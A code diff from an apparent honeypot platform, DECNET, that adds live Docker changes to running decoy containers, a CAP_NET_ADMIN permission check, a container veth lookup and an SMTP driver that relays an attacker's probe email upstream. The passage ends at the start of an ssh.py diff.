+        await anyio.to_thread.run_sync(_first_attempt)
+    except Exception as exc:  # noqa: BLE001
+        if not _is_buildx_wedge(exc):
+            raise
+        _log.warning(
+            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
+            "(legacy builder).  Recover the buildx state at your leisure: "
+            "rm -rf ~/.docker/buildx/activity && "
+            "docker buildx create --name decnet-builder --use --bootstrap",
+            label,
+        )
+    else:
+        return
+    # Kept outside the ``except`` so a failing retry's traceback is
+    # not nested under the first failure.
+    await anyio.to_thread.run_sync(_legacy_attempt)
+
+
+def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
+    """Compose service names for one decky: the base, then its services.
+
+    Each service maps to ``<decky_name>-<service>``.  ``fleet_singleton``
+    services are skipped — those run once fleet-wide and don't have a
+    per-decky compose entry (same filter as compose-render time, see
+    :func:`decnet.topology.compose.generate_topology_compose`).
+    """
+    from decnet.services.registry import get_service
+    names = [decky_name]
+    for service in services:
+        try:
+            definition = get_service(service)
+        except KeyError:
+            # Not in the registry: keep the name anyway.  The compose
+            # render emits no fragment for it, so ``compose up`` fails
+            # with a clear "no such service" error instead of the
+            # name being dropped silently.
+            per_decky = True
+        else:
+            per_decky = not definition.fleet_singleton
+        if per_decky:
+            names.append(f"{decky_name}-{service}")
+    return names
+
+
+async def _live_topology_or_none(
+    repo: Any, topology_id: str,
+) -> Optional[dict[str, Any]]:
+    """Fetch the topology, or None when it must not be materialised live.
+
+    None is returned (so callers need a single ``if`` check) when the
+    topology doesn't exist, when its status is neither ``active`` nor
+    ``degraded`` (pending topologies get everything materialised at
+    deploy time), or when it is pinned to a swarm agent — the latter
+    is also logged at info level.
+
+    NOTE(review): the annotation says ``dict`` but the row is read via
+    attributes (``.status``, ``.target_host_uuid``) — confirm the type.
+    """
+    topology = await repo.get_topology(topology_id)
+    is_live = topology is not None and topology.status in ("active", "degraded")
+    if not is_live:
+        return None
+    if not topology.target_host_uuid:
+        return topology
+    _log.info(
+        "live decky op skipped (agent-pinned topology=%s); "
+        "next agent push will reconcile",
+        topology_id,
+    )
+    return None
+
+
+async def _rerender_compose(repo: Any, topology_id: str) -> None:
+    """Rewrite the per-topology compose file from what ``hydrate`` returns.
+
+    Does nothing when ``hydrate`` yields None.  A failure while writing
+    the file is logged as a warning and swallowed, so a render problem
+    doesn't poison the DB-side mutation.
+    """
+    from decnet.engine.deployer import _topology_compose_path
+    from decnet.topology.compose import write_topology_compose
+    snapshot = await hydrate(repo, topology_id)
+    if snapshot is not None:
+        try:
+            target = _topology_compose_path(topology_id)
+            write_topology_compose(snapshot, target)
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "live op: compose re-render failed topology=%s: %s",
+                topology_id, exc,
+            )
+
+
+async def _materialise_decky_spawn(
+    repo: Any, topology_id: str, decky_name: str, services: list[str],
+) -> bool:
+    """Bring up one decky (base + services): ``compose up -d --no-deps --build``.
+
+    Compose is re-rendered first so the file lists the new decky.
+    Returns True only when compose-up finished without raising; False
+    when the topology isn't eligible for live materialisation (so the
+    caller doesn't flip the state to ``running`` on a no-op) or when
+    compose-up failed — logged, not re-raised; DB row is the truth.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return False
+    from decnet.engine.deployer import _topology_compose_path
+    await _rerender_compose(repo, topology_id)
+    targets = _decky_targets(decky_name, services)
+    compose_path = _topology_compose_path(topology_id)
+    op_label = f"live add_decky topology={topology_id} decky={decky_name}"
+    succeeded = False
+    try:
+        await _compose_up_with_buildkit_fallback(
+            "up", "-d", "--no-deps", "--build", *targets,
+            compose_file=compose_path, label=op_label,
+        )
+        succeeded = True
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live add_decky: compose up failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+    return succeeded
+
+
+async def _materialise_decky_remove(
+    repo: Any, topology_id: str, decky_name: str, services: list[str],
+) -> None:
+    """Stop and ``rm -f`` one decky's containers, then re-render compose.
+
+    No-op unless the topology is eligible for live materialisation.
+    Each compose step is best-effort: a failure is logged as a warning
+    and the next step still runs.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import _compose, _topology_compose_path
+
+    targets = _decky_targets(decky_name, services)
+    compose_path = _topology_compose_path(topology_id)
+    # Ordering matters: both steps run against the compose file as it
+    # is on disk now.  Once re-rendered it no longer mentions the
+    # decky, and ``stop`` would find no service to act on.
+    steps = (
+        (("stop",),
+         "live remove_decky: compose stop failed topology=%s decky=%s: %s"),
+        (("rm", "-f"),
+         "live remove_decky: compose rm failed topology=%s decky=%s: %s"),
+    )
+    for verb, failure_message in steps:
+        def _run(verb: tuple = verb) -> None:
+            _compose(*verb, *targets, compose_file=compose_path)
+        try:
+            await anyio.to_thread.run_sync(_run)
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(failure_message, topology_id, decky_name, exc)
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_connect(
+    repo: Any, topology_id: str,
+    decky_name: str, lan_name: str, ipv4_address: str,
+) -> None:
+    """SDK ``network.connect`` to multi-home a running base container.
+
+    Service containers share the base's netns via ``network_mode:
+    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
+    the base alone gives every service container the new interface.
+    Best-effort: SDK errors are logged, never raised; an "already
+    attached" APIError counts as success.  The client is always closed.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    from contextlib import closing
+    import docker
+    from decnet.topology.compose import _container_name, _network_name
+
+    net_name = _network_name(topology_id, lan_name)
+    container_name = _container_name(topology_id, decky_name)
+    try:
+        # closing() releases the client's connections on exit.
+        with closing(docker.from_env()) as client:
+            net = client.networks.get(net_name)
+            net.connect(client.containers.get(container_name), ipv4_address=ipv4_address)
+    except docker.errors.APIError as exc:
+        msg = str(exc).lower()
+        # Idempotency — already on the network is fine (grouping explicit).
+        if "already" in msg or ("endpoint" in msg and "exists" in msg):
+            _log.info("live attach_decky: %s already on network %s — skipping",
+                      container_name, net_name)
+        else:
+            _log.error(
+                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
+                topology_id, decky_name, lan_name, exc,
+            )
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
+            topology_id, decky_name, lan_name, exc,
+        )
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_disconnect(
+    repo: Any, topology_id: str, decky_name: str, lan_name: str,
+) -> None:
+    """SDK ``network.disconnect`` to drop a multi-home edge (best-effort).
+
+    SDK errors are logged, never raised; the docker client is closed.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    from contextlib import closing
+    import docker
+    from decnet.topology.compose import _container_name, _network_name
+    net_name = _network_name(topology_id, lan_name)
+    container_name = _container_name(topology_id, decky_name)
+    try:
+        with closing(docker.from_env()) as client:
+            net = client.networks.get(net_name)
+            net.disconnect(client.containers.get(container_name))
+    except docker.errors.APIError as exc:
+        msg = str(exc).lower()
+        if "not connected" in msg or "no such" in msg:
+            _log.info("live detach_decky: %s already off network %s — skipping",
+                      container_name, net_name)
+        else:
+            _log.error(
+                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
+                topology_id, decky_name, lan_name, exc,
+            )
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
+            topology_id, decky_name, lan_name, exc,
+        )
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_services_diff(
+    repo: Any, topology_id: str, decky_name: str,
+    added: list[str], removed: list[str],
+) -> None:
+    """Add/remove per-service containers without touching siblings.
+
+    Removed services are stopped + ``rm -f``'d BEFORE compose is
+    re-rendered: the fresh file no longer lists them, so a later stop
+    would find no service to act on.  Added services are brought up
+    AFTER the re-render, which is what makes them known to compose.
+    The base container is never a target here.
+
+    Best-effort: every compose failure is logged, none is raised.
+    No-op when both lists are empty or the topology isn't live.
+    """
+    if not added and not removed:
+        return
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import _compose, _topology_compose_path
+
+    compose_path = _topology_compose_path(topology_id)
+    rm_targets = _decky_targets(decky_name, list(removed))[1:]  # drop the base
+    rm_steps = (("stop", ("stop",)), ("rm", ("rm", "-f"))) if rm_targets else ()
+    for action_name, args in rm_steps:
+        try:
+            await anyio.to_thread.run_sync(
+                lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
+            )
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "live update_decky %s failed topology=%s decky=%s: %s",
+                action_name, topology_id, decky_name, exc,
+            )
+    await _rerender_compose(repo, topology_id)
+    add_targets = _decky_targets(decky_name, list(added))[1:]  # drop the base
+    if add_targets:
+        try:
+            await _compose_up_with_buildkit_fallback(
+                "up", "-d", "--no-deps", "--build", *add_targets,
+                compose_file=compose_path,
+                label=f"live update_decky add topology={topology_id} decky={decky_name}",
+            )
+        except Exception as exc:  # noqa: BLE001
+            _log.error(
+                "live update_decky add: compose up failed topology=%s decky=%s: %s",
+                topology_id, decky_name, exc,
+            )
+
+
+async def _materialise_decky_recreate_base(
+    repo: Any, topology_id: str, decky_name: str,
+) -> None:
+    """Force-recreate only the decky's base container (forwards_l3 flips).
+
+    DESTRUCTIVE: in-container state on the base is lost.  Service
+    containers re-attach via ``network_mode: service:<base>`` once the
+    base is rebuilt.  Gating on an explicit operator ``force=true`` is
+    the caller's job.  Failures are logged, not raised.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import _compose_with_retry, _topology_compose_path
+    await _rerender_compose(repo, topology_id)
+    compose_path = _topology_compose_path(topology_id)
+
+    def _recreate() -> None:
+        _compose_with_retry(
+            "up", "-d", "--no-deps", "--force-recreate", decky_name,
+            compose_file=compose_path,
+        )
+
+    try:
+        await anyio.to_thread.run_sync(_recreate)
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live update_decky recreate_base failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+
+
 # ------------------------------------------------------------------- ops


@@ -131,6 +588,16 @@ async def apply_add_lan(
            "y": payload.get("y"),
        }
    )
+
+    # Live materialisation: when the topology is active/degraded, create
+    # the docker bridge network now and re-render the per-topology
+    # compose file so subsequent ``apply_add_decky`` writes a coherent
+    # services map.  Pending topologies skip this — the next deploy
+    # creates everything from scratch.  Agent-pinned topologies also
+    # skip; live editing on agents is its own routing problem.
+    await _materialise_lan_change(
+        repo, topology_id, created=(name, subnet, is_dmz),
+    )
    await _assert_valid_after(repo, topology_id)


@@ -150,7 +617,17 @@ async def apply_remove_lan(
                f"LAN {lan['name']!r} is the home LAN of decky "
                f"{d['decky_config']['name']!r}; remove the decky first"
            )
-    await repo.delete_lan(lan["id"])
+    lan_name = lan["name"]
+    # enforce_pending=False: the mutator queue is the live-editing
+    # surface, gated on topology status by us before we got here.  The
+    # repo's pending-only guard is for HTTP CRUD callers that mustn't
+    # bypass it.
+    await repo.delete_lan(lan["id"], enforce_pending=False)
+
+    # Live materialisation symmetric to apply_add_lan: tear down the
+    # docker bridge and re-render compose so a future redeploy doesn't
+    # try to wire deckies into a network that no longer exists.
+    await _materialise_lan_change(repo, topology_id, removed=lan_name)
    await _assert_valid_after(repo, topology_id)


@@ -204,11 +681,12 @@ async def apply_add_decky(
    if forwards_l3:
        decky_config["forwards_l3"] = True

+    services_list = list(payload.get("services", []))
    decky_uuid = await repo.add_topology_decky(
        {
            "topology_id": topology_id,
            "name": name,
-            "services": list(payload.get("services", [])),
+            "services": services_list,
            "decky_config": decky_config,
            "x": payload.get("x"),
            "y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
            "forwards_l3": forwards_l3,
        }
    )
+    # Live materialisation: spawn the new decky's containers without
+    # touching siblings.  Skips on pending / agent-pinned topologies —
+    # see _live_topology_or_none.
+    spawned = await _materialise_decky_spawn(
+        repo, topology_id, name, services_list,
+    )
+    # Flip the row's state to 'running' on success so the dashboard's
+    # ACTIVE DECKIES count reflects reality.  Without this the row
+    # stays at the default 'pending' forever; the deployer's full
+    # post-deploy reconcile only runs on a fresh deploy_topology.
+    if spawned:
+        try:
+            await repo.update_topology_decky(decky_uuid, {"state": "running"})
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "live add_decky: state flip to running failed "
+                "topology=%s decky=%s: %s",
+                topology_id, name, exc,
+            )
    await _assert_valid_after(repo, topology_id)


@@ -286,6 +783,16 @@ async def apply_attach_decky(
            "forwards_l3": forwards_l3,
        }
    )
+    # Live materialisation: SDK network.connect on the base container.
+    # Service containers share the base's netns via network_mode:
+    # service:<base>, so they inherit the new interface — only the base
+    # needs the connect.
+    await _materialise_decky_connect(
+        repo, topology_id,
+        decky_name=decky["decky_config"]["name"],
+        lan_name=lan["name"],
+        ipv4_address=ip,
+    )
    await _assert_valid_after(repo, topology_id)


@@ -329,7 +836,15 @@ async def apply_detach_decky(
    await repo.update_topology_decky(
        decky["uuid"], {"decky_config": new_cfg}
    )
-    await repo.delete_topology_edge(edge["id"])
+    await repo.delete_topology_edge(edge["id"], enforce_pending=False)
+    # Live materialisation: SDK network.disconnect on the base
+    # container.  Service containers automatically lose visibility into
+    # the LAN because they share the base's netns.
+    await _materialise_decky_disconnect(
+        repo, topology_id,
+        decky_name=decky["decky_config"]["name"],
+        lan_name=lan["name"],
+    )
    await _assert_valid_after(repo, topology_id)


@@ -340,7 +855,15 @@ async def apply_remove_decky(
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
-    await repo.delete_topology_decky(decky["uuid"])
+    decky_name = decky["decky_config"]["name"]
+    services_list = list(decky.get("services") or [])
+    await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
+    # Live materialisation: stop + rm -f the decky's containers.  We
+    # capture decky_name + services BEFORE the delete so the helper
+    # has the targets even though the row is gone.
+    await _materialise_decky_remove(
+        repo, topology_id, decky_name, services_list,
+    )
    await _assert_valid_after(repo, topology_id)


@@ -354,31 +877,136 @@ async def apply_update_decky(
        ``patch``         — dict merged into existing ``decky_config``.
        ``services``      — replacement top-level services list.
        ``x``,``y``       — layout coords.
+        ``force``         — opt-in for destructive recreates (currently
+                            required when ``forwards_l3`` flips on a
+                            live topology — see below).
+
+    Live materialisation strategy:
+
+    * **services changed** → diff old vs new; ``compose up -d`` for
+      added, ``compose stop`` + ``rm -f`` for removed.  Mirrors the
+      direct API path (services_live) without coupling.
+    * **forwards_l3 flipped** → port publishing changes, which docker
+      can only apply at container-create time.  Requires recreating
+      the base — destructive (kills in-container state, drops active
+      sessions).  Gated on ``payload['force'] is True``; otherwise we
+      raise ``MutationError`` so a half-thinking operator doesn't
+      stomp a live decky.
+    * **only coords (x/y)** → DB-only.  No docker work.
    """
    hydrated = await _hydrated(repo, topology_id)
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
+
+    # Capture pre-state so we can compute the diff after the DB write.
+    old_services = list(decky.get("services") or [])
+    old_cfg = decky.get("decky_config") or {}
+    old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
+
    patch: dict[str, Any] = {}
+    new_decky_config = old_cfg
    if payload.get("patch"):
-        merged = dict(decky["decky_config"])
-        merged.update(payload["patch"])
-        patch["decky_config"] = merged
+        new_decky_config = {**old_cfg, **payload["patch"]}
+        patch["decky_config"] = new_decky_config
+    new_services = old_services
    if "services" in payload:
-        patch["services"] = list(payload["services"])
+        new_services = list(payload["services"])
+        patch["services"] = new_services
    for key in ("x", "y"):
        if key in payload:
            patch[key] = payload[key]
    if not patch:
        return
+
+    new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
+    forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
+
+    # Promotion path: refuse to flip a non-DMZ decky to gateway.  The
+    # 'gateway' semantic specifically means 'host-port publisher facing
+    # the DMZ' — running it on an internal LAN publishes ports the
+    # outside world can't reach and shadows the host's port space.
+    # Generic L3-bridge forwards_l3 (internal multi-homing) is set by
+    # the generator/attach paths, not by this op, so this check only
+    # fires when the operator explicitly toggles the flag.
+    if forwards_l3_flipped and new_forwards_l3:
+        # Re-derive the home LAN from the edges; same logic as
+        # check_gateway_homed_in_dmz.
+        decky_uuid = decky["uuid"]
+        home_lan_id: Optional[str] = None
+        for e in hydrated["edges"]:
+            if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
+                home_lan_id = e["lan_id"]
+                break
+        if home_lan_id is None:
+            for e in hydrated["edges"]:
+                if e["decky_uuid"] == decky_uuid:
+                    home_lan_id = e["lan_id"]
+                    break
+        home_lan = next(
+            (lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
+            None,
+        )
+        if home_lan is None or not home_lan.get("is_dmz"):
+            home_name = home_lan["name"] if home_lan else "(unknown)"
+            raise MutationError(
+                f"cannot promote decky {decky['decky_config']['name']!r} "
+                f"to gateway: home LAN {home_name!r} is not a DMZ. "
+                "Move the decky to the DMZ first, or pick a different decky."
+            )
+
+    # Pre-check the destructive flip BEFORE any DB write, so a refused
+    # mutation leaves zero side-effects.
+    is_live = (await _live_topology_or_none(repo, topology_id)) is not None
+    if is_live and forwards_l3_flipped and not bool(payload.get("force")):
+        raise MutationError(
+            f"forwards_l3 flip on live decky "
+            f"{decky['decky_config']['name']!r} requires force=true; "
+            "this will recreate the base container and drop in-container state"
+        )
+
    await repo.update_topology_decky(decky["uuid"], patch)
+
+    # Materialisation — only when the topology is actually live.
+    # _live_topology_or_none was already called above; calling the
+    # individual helpers re-checks (cheap) so they stay self-contained.
+    decky_name = decky["decky_config"]["name"]
+    added = sorted(set(new_services) - set(old_services))
+    removed = sorted(set(old_services) - set(new_services))
+    if added or removed:
+        await _materialise_decky_services_diff(
+            repo, topology_id, decky_name, added, removed,
+        )
+    if forwards_l3_flipped:
+        # force was checked above; reaching here means the operator
+        # opted in.  recreate_base re-renders compose first so the
+        # rebuilt base picks up the new `ports:` block.
+        await _materialise_decky_recreate_base(
+            repo, topology_id, decky_name,
+        )
+
    await _assert_valid_after(repo, topology_id)


 async def apply_update_lan(
    repo: Any, topology_id: str, payload: dict[str, Any]
 ) -> None:
-    """Update LAN fields — subnet, is_dmz, coords, rename."""
+    """Update LAN fields — subnet, is_dmz, coords, rename.
+
+    Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
+    Live deckies bind to the bridge with IPs allocated from the old
+    subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
+    flag, which docker can't change on a network with active
+    containers).  Reject those mutations on active/degraded topologies
+    rather than rewriting the DB into an incoherent state.
+
+    Coord-only updates (``x``/``y``) are layout-only; let them through
+    unconditionally.  Renames pass through too — the bridge's docker
+    name is keyed off ``_network_name(topology_id, lan_name)``, so a
+    rename would also need a rebuild — but rename isn't currently a
+    code path on active topologies; if the operator hits it we still
+    write the row and let the next deploy reconcile.
+    """
    hydrated = await _hydrated(repo, topology_id)
    lan = _lan_by_name(hydrated, payload["name"])
    if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
            fields[key] = payload[key]
    if not fields:
        return
+
+    topology = await repo.get_topology(topology_id)
+    is_live = bool(topology) and topology.status in ("active", "degraded")
+    if is_live:
+        hostile = {"subnet", "is_dmz"} & fields.keys()
+        if hostile:
+            raise MutationError(
+                f"cannot change {sorted(hostile)} on a deployed LAN; "
+                f"teardown + redeploy required"
+            )
+
    await repo.update_lan(lan["id"], fields)
    await _assert_valid_after(repo, topology_id)

--- a/decnet/network.py
+++ b/decnet/network.py
@@ -151,11 +151,20 @@ def _ensure_network(
        options.update(extra_options)

    for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
+        # networks.list() doesn't populate Containers — reload to get the
+        # full inspect payload (including connected container IDs).
+        try:
+            net.reload()
+        except docker.errors.APIError:
+            pass
+
        if net.attrs.get("Driver") == driver:
            # Same driver — but if the IPAM pool drifted (different subnet,
            # gateway, or ip-range than this deploy asks for), reusing it
            # hands out addresses from the old pool and we race the real LAN.
-            # Compare and rebuild on mismatch.
+            # Compare and rebuild on mismatch — but only when no containers
+            # are attached. With active endpoints Docker refuses the remove
+            # with 403; just attach to the existing network instead.
            pools = (net.attrs.get("IPAM") or {}).get("Config") or []
            cur = pools[0] if pools else {}
            if (
@@ -164,8 +173,15 @@ def _ensure_network(
                and cur.get("IPRange") == ip_range
            ):
                return  # right driver AND matching pool, leave it alone
-        # Driver mismatch OR IPAM drift — tear it down. Disconnect any live
-        # containers first so `remove()` doesn't refuse with ErrNetworkInUse.
+            if net.attrs.get("Containers"):
+                # Active endpoints — can't safely rebuild. Attach to the
+                # existing network; IPAM drift on ip_range only affects
+                # Docker's auto-assign pool, which DECNET doesn't use
+                # (IPs are always set explicitly in the compose file).
+                return
+        # Driver mismatch OR empty-endpoint IPAM drift — tear it down.
+        # Disconnect any live containers first so `remove()` doesn't
+        # refuse with ErrNetworkInUse.
        for cid in (net.attrs.get("Containers") or {}):
            try:
                net.disconnect(cid, force=True)
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
 # Host-side macvlan interface (hairpin fix)
 # ---------------------------------------------------------------------------

-def _require_root() -> None:
-    if os.geteuid() != 0:
-        raise PermissionError(
-            "MACVLAN host-side interface setup requires root. Run with sudo."
-        )
+# Linux capability bit positions — see capabilities(7).
+_CAP_NET_ADMIN = 12
+
+
+def _has_cap_net_admin() -> bool:
+    """Report whether CAP_NET_ADMIN is in this process's effective set.
+
+    Parses the ``CapEff`` line of ``/proc/self/status`` (a hex bitmask)
+    rather than calling ``capget(2)``, so no libcap dependency is needed.
+    Returns False if the file can't be read or has no ``CapEff`` line.
+    """
+    wanted = 1 << _CAP_NET_ADMIN
+    try:
+        with open("/proc/self/status", "r") as status:
+            for entry in status:
+                if entry.startswith("CapEff:"):
+                    return bool(int(entry.split()[1], 16) & wanted)
+    except OSError:
+        return False
+    return False
+
+
+def _require_net_admin() -> None:
+    """Raise PermissionError unless the process may create macvlan/ipvlan links.
+
+    Root (euid 0) always passes, since it grants every capability.  Otherwise
+    CAP_NET_ADMIN in the effective set is accepted: it is what the kernel
+    checks for the netlink RTM_NEWLINK behind ``ip link add ... macvlan``, so
+    a systemd unit with ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured
+    without forcing the whole API to run as root.
+    """
+    allowed = os.geteuid() == 0 or _has_cap_net_admin()
+    if not allowed:
+        raise PermissionError(
+            "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
+            "Either run as root or grant the cap (systemd: "
+            "AmbientCapabilities=CAP_NET_ADMIN)."
+        )


 def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
    host-helper first: the two drivers can share a parent NIC on paper but
    leaving the opposite helper in place is just cruft after a driver swap.
    """
-    _require_root()
+    _require_net_admin()
+
+    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str


 def teardown_host_macvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
    host-helper first so a prior macvlan deploy doesn't leave its slave
    dangling on the parent NIC after the driver swap.
    """
-    _require_root()
+    _require_net_admin()
+
+    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)


 def teardown_host_ipvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
        strict=False,
    )
    return str(network)
+
+
+# ---------------------------------------------------------------------------
+# Container veth resolution (for tc netem tarpit)
+# ---------------------------------------------------------------------------
+
+def get_container_pid(container_name: str) -> int:
+    """Look up the init-process PID of the running container *container_name*."""
+    api = docker.from_env()
+    try:
+        target = api.containers.get(container_name)
+    except docker.errors.NotFound:
+        raise LookupError(f"container {container_name!r} not found")
+    init_pid = target.attrs["State"]["Pid"]
+    if init_pid:
+        return init_pid
+    raise LookupError(f"container {container_name!r} is not running (PID=0)")
+
+
+def get_container_veth(container_name: str) -> str:
+    """Resolve the host-side veth name paired with the container's eth0.
+
+    Runs ``cat /sys/class/net/eth0/iflink`` in the container via
+    ``docker exec`` to learn the peer ifindex, then scans the host's
+    ``ip link show`` output for the entry that starts with that index.
+    Raises LookupError if the exec fails or no entry matches.
+    """
+    probe = _run(
+        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
+        check=False,
+    )
+    if probe.returncode != 0:
+        raise LookupError(
+            f"container {container_name!r} not reachable: {probe.stderr.strip()}"
+        )
+    peer_index = probe.stdout.strip()
+    wanted = f"{peer_index}:"
+    for entry in _run(["ip", "link", "show"]).stdout.splitlines():
+        if entry.startswith(wanted):
+            # Entry looks like "42: veth3a4b5c@if41: <BROADCAST,...>".
+            return entry.split(":")[1].strip().split("@")[0]
+    raise LookupError(
+        f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
+    )
--- a/decnet/orchestrator/drivers/init.py
+++ b/decnet/orchestrator/drivers/init.py
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
    try:
        from decnet.orchestrator.emailgen.scheduler import EmailAction
    except ImportError:  # pragma: no cover - scheduler always exists
-        EmailAction = None  # type: ignore[assignment]
+        EmailAction = None  # type: ignore[assignment, misc]
    if EmailAction is not None and isinstance(action, EmailAction):
        from decnet.orchestrator.drivers.email import EmailDriver
        return EmailDriver()
--- a/decnet/orchestrator/drivers/email.py
+++ b/decnet/orchestrator/drivers/email.py
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
        """Convenience accessor for telemetry / logging."""
        return self._llm.model

-    async def run(self, action: EmailAction) -> ActivityResult:
+    async def run(self, action: EmailAction) -> ActivityResult:  # type: ignore[override]
        return await self._run_email(action)

    async def _run_email(self, action: EmailAction) -> ActivityResult:
--- a/decnet/orchestrator/drivers/smtp_relay.py
+++ b/decnet/orchestrator/drivers/smtp_relay.py
@@ -0,0 +1,80 @@
+"""SMTP probe-relay driver.
+
+Forwards the attacker's first probe email via the master's real internet
+connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
+the master (where this worker runs) does.
+
+Called by the realism worker's smtp probe listener, not the main tick loop.
+"""
+from __future__ import annotations
+
+import email
+import smtplib
+from pathlib import Path
+from typing import Any
+
+_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
+
+
+def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
+    """Return body with a From: header added if one is absent."""
+    try:
+        msg = email.message_from_bytes(body)
+    except Exception:
+        return body
+    if msg["From"]:
+        return body
+    safe_from = mail_from.replace("\r", "").replace("\n", "")  # no header injection
+    sep = b"" if msg.keys() or body[:1] in (b"\r", b"\n") else b"\r\n"  # headerless body
+    return f"From: {safe_from}\r\n".encode() + sep + body
+
+
+def forward_probe(
+    *,
+    svc_cfg: dict[str, Any],
+    stored_as: str,
+    decky_name: str,
+    mail_from: str,
+    rcpt_to: list[str],
+    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
+) -> tuple[bool, str]:
+    """Read the .eml from disk and forward it via the upstream relay.
+
+    Returns (True, "") on success or (False, reason) on failure (this includes an
+    unsafe eml path or a non-numeric port).  Safe to call in a thread — blocking I/O only.
+    """
+    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
+    if not upstream_host:
+        return False, "upstream_host not configured"
+
+    # Path parts come from a bus payload: reject absolute paths and ".." hops.
+    rel_path = Path(decky_name) / "smtp" / stored_as
+    if rel_path.is_absolute() or ".." in rel_path.parts:
+        return False, "eml path escapes artifacts root"
+    eml_path = Path(artifacts_root) / rel_path
+    try:
+        body = eml_path.read_bytes()
+    except OSError as exc:
+        return False, f"cannot read eml: {exc}"
+    if not rcpt_to:
+        return False, "no recipients"
+
+    upstream_user  = (svc_cfg.get("upstream_user") or "").strip()
+    upstream_pass  = (svc_cfg.get("upstream_pass") or "").strip()
+    envelope_from  = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
+    # Add a From: header when absent so mail clients show the attacker's address
+    # instead of the envelope sender; bare relay-test scripts often send none.
+    body = _ensure_from_header(body, mail_from)
+    try:
+        upstream_port = int(svc_cfg.get("upstream_port") or 25)  # bad value -> (False, ...)
+        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
+            conn.ehlo()
+            if conn.has_extn("STARTTLS"):
+                conn.starttls()
+                conn.ehlo()
+            if upstream_user and upstream_pass:
+                conn.login(upstream_user, upstream_pass)
+            conn.sendmail(envelope_from, rcpt_to, body)
+        return True, ""
+    except Exception as exc:
+        return False, str(exc)[:256]
--- a/decnet/orchestrator/drivers/ssh.py
+++ b/decnet/orchestrator/drivers/ssh.py
